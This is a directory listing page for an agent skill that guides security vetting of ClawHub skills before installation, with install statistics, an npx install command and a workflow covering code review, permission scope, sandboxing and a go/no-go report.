clawhub-skill-vetting
52
总安装量
52
周安装量
#7538
全站排名
安装命令
npx skills add https://github.com/hugomrtz/skill-vetting-clawhub --skill clawhub-skill-vetting
Agent 安装分布
gemini-cli
50
github-copilot
50
codex
50
amp
50
cline
50
kimi-cli
50
Skill 文档
ClawHub Skill Vetting
Overview
Apply a strict, securityâfirst vetting workflow before installing any ClawHub skill. Prioritize code review, permission scope, domain listing, and risk scoring.
Workflow
- Source check â author reputation, stars/downloads, last update, reviews.
- Code review (MANDATORY) â scan all files for exfiltration, secrets access,
eval/exec, obfuscation. - Permission scope â files, commands, network; confirm minimal scope.
- Recent activity â detect suspicious bursts.
- Community check â Discord/GitHub Discussions.
- Install safely â sandbox + inspect permissions.
Reference
Use references/vetting-guide.md for the full checklist, commands, red flags, confidence scoring, and report template.
Output expectations
- Produce the SKILL VETTING REPORT format.
- Provide a go/noâgo recommendation with reasons.
- If unclear, recommend sandbox install only or reject.
- Call out any red flags explicitly.
- Include a confidence score and threshold.